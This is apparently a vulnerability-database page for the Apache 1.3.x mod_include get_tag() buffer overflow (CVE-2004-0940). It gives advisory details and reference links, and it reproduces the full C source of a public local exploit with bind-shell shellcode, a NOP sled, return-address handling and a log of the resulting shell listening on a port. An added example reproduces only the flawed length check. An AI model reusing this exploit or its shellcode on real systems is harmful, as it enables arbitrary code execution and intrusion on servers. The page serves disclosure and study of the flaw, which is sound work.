Apache mod_include Local Buffer Overflow Vulnerability

Vulnerability ID 1108226 Vulnerability type Buffer overflow
Published 2004-10-18 Updated 2006-08-16
CVE ID CVE-2004-0940 CNNVD ID CNNVD-200502-029
Platform Linux CVSS score 6.9
|Sources
https://www.exploit-db.com/exploits/24694
https://www.securityfocus.com/bid/11471
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-029
|Vulnerability details
mod_include is a standard Apache module that lets users include files, execute commands and so on from within HTML. The get_tag() function in mod_include does not adequately validate user-supplied input, and a local attacker can exploit this to mount a buffer overflow attack. Specifically, get_tag() contains a buffer overflow that an attacker can trigger via handle_echo(): a local user can create a specially crafted HTML file which, when processed by Apache, may execute arbitrary code with the privileges of the httpd child process.
|Exploit
source: http://www.securityfocus.com/bid/11471/info

The problem presents itself when the affected module attempts to parse mod_include-specific tag values. A failure to properly validate the lengths of user-supplied tag strings before copying them into finite buffers facilitates the overflow. 

A local attacker may leverage this issue to execute arbitrary code on the affected computer with the privileges of the affected Apache server.

/*********************************************************************************
 local exploit for mod_include of apache 1.3.x                                   *
 written by xCrZx                         /18.10.2004/                           *
 bug found by xCrZx                       /18.10.2004/                           *
                                                                                 *
 y0das old shao lin techniq ownz u :) remember my words                          *
 http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3                            *
                                                                                 *
 Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)                  *
*********************************************************************************/
 
/*********************************************************************************
 Technical Details:                                                              *
                                                                                 *
 there is an overflow in get_tag function:                                       *
                                                                                 *
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{                                                                                *
...                                                                              *
    term = c;                                                                    *
    while (1) {                                                                  *
        GET_CHAR(in, c, NULL, p);                                                *
[1]        if (t - tag == tagbuf_len) {                                          *
            *t = '\0';                                                           *
            return NULL;                                                         *
        }                                                                        *
// Want to accept \" as a valid character within a string. //                    *
        if (c == '\\') {                                                         *
[2]            *(t++) = c;         // Add backslash //                           *
            GET_CHAR(in, c, NULL, p);                                            *
            if (c == term) {    // Only if //                                    *
[3]                *(--t) = c;     // Replace backslash ONLY for terminator //   *
            }                                                                    *
        }                                                                        *
        else if (c == term) {                                                    *
            break;                                                               *
        }                                                                        *
[4]        *(t++) = c;                                                           *
    }                                                                            *
    *t = '\0';                                                                   *
...                                                                              *
                                                                                 *
as we can see there is a [1] check to determine the end of tag buffer            *
 but this check can be skipped when the [2] & [4] conditions occur               *
 at the same time without the [3] condition.                                     *
                                                                                 *
 So an attacker can create a malicious file to overflow the static buffer        *
 that tag points to and execute arbitrary code with the privileges of            *
 the httpd child process.                                                        *
                                                                                 *
Fix:                                                                             *
[1*]        if (t - tag >= tagbuf_len-1) {                                       *
                                                                                 *
 Notes: To activate mod_include you need to write "XBitHack on" in httpd.conf    *
                                                                                 *
*********************************************************************************/
 
/*********************************************************************************
  Example of work:                                                               *
                                                                                 *
  [root@blacksand htdocs]# make 85mod_include                                    *
  cc     85mod_include.c   -o 85mod_include                                      *
  [root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html                *
  [root@blacksand htdocs]# chmod +x evil.html                                    *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  [root@blacksand htdocs]# telnet localhost 8080                                 *
  Trying 127.0.0.1...                                                            *
  Connected to localhost.                                                        *
  Escape character is '^]'.                                                      *
  GET /evil.html HTTP/1.0                                                        *
  ^]                                                                             *
  telnet> q                                                                      *
  Connection closed.                                                             *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  tcp        0      0 0.0.0.0:52986           0.0.0.0:*               LISTEN     *
  [root@blacksand htdocs]#                                                       *
*********************************************************************************/
 
/*********************************************************************************
  Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always                  *
*********************************************************************************/
 
/*********************************************************************************
  Personal hello to my parents :)                                                *
*********************************************************************************/
 
/*********************************************************************************
 Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz           *
*********************************************************************************/
 
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   // strlen, memcpy, memset
#include <fcntl.h>
 
#define EVILBUF 8202
#define HTMLTEXT 1000
 
#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"
 
#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"

 
int main(int argc, char **argv) {
 
	char html[EVILBUF+HTMLTEXT];
	char evilbuf[EVILBUF+1];
 
	//can be changed
	char shellcode[] =
 
    // bind shell on 52986 port 
    "\x31\xc0"
    "\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
    "\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
    "\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
    "\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
    "\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
 
    //execve /tmp/sh <- your own program
   /*
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/tmp/sh";
   */
 
 
	char NOP[] = "\x90\x40";             // special nops ;)
	char evilpad[] = "\\CRZCRZCRZCRZC";  // trick ;)
 
	int padding,xpad=0;
	int i,fd;
	long ret=0xbfff8688;
 
	if(argc>1) ret=strtoul(argv[1],0,16);
	else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exit(0); }
 
	padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
 
	while(1) {
		if(padding%2==0) { padding/=2; break;}
		else {padding--;xpad++;}
	}
 
	memset(html,0x0,sizeof html);
	memset(evilbuf,0x0,sizeof evilbuf);
 
	for(i=0;i<padding;i++)
		memcpy(evilbuf+strlen(evilbuf),&NOP,2);
	for(i=0;i<xpad;i++)
		memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);

 
	memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
	memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
	*(long*)&evilbuf[strlen(evilbuf)]=ret;   // return address; assumes a 32-bit build where long is 4 bytes
 
	sprintf(html,HTML_FORMAT,evilbuf);
 
	printf("%s",html);
 
	return 0;
}
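To see why the [1] check in the get_tag() excerpt quoted above can be stepped over, here is an added example (my own stand-in, not Apache's code and not the exploit author's): it reproduces only the loop's length accounting, using a small constructed tag buffer followed by a canary region, and contrasts the original `==` check with the `>=` check the exploit author proposes as a fix. TAGBUF, SLACK, copy_quoted and overrun_bytes are names chosen here; the real GET_CHAR/pool plumbing is replaced by a plain byte buffer.

```c
#include <string.h>

#define TAGBUF 16  /* constructed: usable tag bytes; tag[TAGBUF] holds the NUL */
#define SLACK  64  /* canary bytes after the tag buffer, used to measure overrun */

/* Stand-in for the quoted-value loop of Apache 1.3 mod_include get_tag()
 * (added example, not Apache's code). `fixed` selects the page's proposed
 * [1*] check instead of [1]. Returns bytes copied, or -1 on cutoff/EOF. */
static int copy_quoted(const char *in, size_t in_len, char *tag,
                       int tagbuf_len, int fixed)
{
    const char term = '"';
    char *t = tag, c;
    size_t i = 0;
    while (1) {
        if (i >= in_len) return -1;
        c = in[i++];
        if (!fixed && t - tag == tagbuf_len) { *t = '\0'; return -1; }     /* [1]  */
        if (fixed && t - tag >= tagbuf_len - 1) { *t = '\0'; return -1; }  /* [1*] */
        if (c == '\\') {
            *(t++) = c;                        /* [2] first write this round  */
            if (i >= in_len) return -1;
            c = in[i++];
            if (c == term) *(--t) = c;         /* [3] \" collapses to a quote */
        } else if (c == term) {
            break;
        }
        *(t++) = c;                            /* [4] second write this round */
    }
    *t = '\0';
    return (int)(t - tag);
}

/* Builds a constructed value (optional lead byte, `pairs` copies of \A, closing
 * quote), parses it into a canary-filled buffer and returns how many bytes land
 * past tag[TAGBUF]. A lead byte makes t - tag odd, so with an even TAGBUF the
 * [1] equality test is stepped over, as the page describes. */
int overrun_bytes(int lead, int pairs, int fixed)
{
    char input[2 * SLACK + 4], backing[TAGBUF + 1 + SLACK];
    int n = 0, over = 0;
    if (lead) input[n++] = 'X';
    for (int k = 0; k < pairs && k < SLACK; k++) { input[n++] = '\\'; input[n++] = 'A'; }
    input[n++] = '"';
    memset(backing, 'C', sizeof backing);
    copy_quoted(input, (size_t)n, backing, TAGBUF, fixed);
    for (int k = TAGBUF + 1; k < (int)sizeof backing; k++)
        if (backing[k] != 'C') over = k - TAGBUF;      /* last dirtied byte */
    return over;
}
```

With a lead byte and 20 `\A` pairs the original check never sees t - tag == 16 and 25 bytes land past the buffer; the same input with pairs only, or with the `>=` check, writes nothing past it.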
|Affected products
Trustix Secure Linux 1.5 SuSE Linux 8.1 SuSE Linux 8.0 Sun Solaris 9_x86 Sun Solaris 9 Sun Solaris 8_x86 Sun Solaris 8_sparc Slackware L
|References

Source: BID
Name: 11471
Link: http://www.securityfocus.com/bid/11471
Source: OPENPKG
Name: OpenPKG-SA-2004.047
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109906660225051&w=2
Source: XF
Name: apache-modinclude-bo(17785)
Link: http://xforce.iss.net/xforce/xfdb/17785
Source: REDHAT
Name: RHSA-2005:816
Link: http://www.redhat.com/support/errata/RHSA-2005-816.html
Source: REDHAT
Name: RHSA-2004:600
Link: http://www.redhat.com/support/errata/RHSA-2004-600.html
Source: MANDRAKE
Name: MDKSA-2004:134
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2004:134
Source: VUPEN
Name: ADV-2006-0789
Link: http://www.frsirt.com/english/advisories/2006/0789
Source: DEBIAN
Name: DSA-594
Link: http://www.debian.org/security/2004/dsa-594
Source: www.apacheweek.com
Link: http://www.apacheweek.com/features/security-13
Source: support.avaya.com
Link: http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
Source: SUNALERT
Name: 102197
Link: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102197-1
Source: SECTRACK
Name: 1011783
Link: http://securitytracker.com/id?1011783
Source: SECUNIA
Name: 19073
Link: http://sec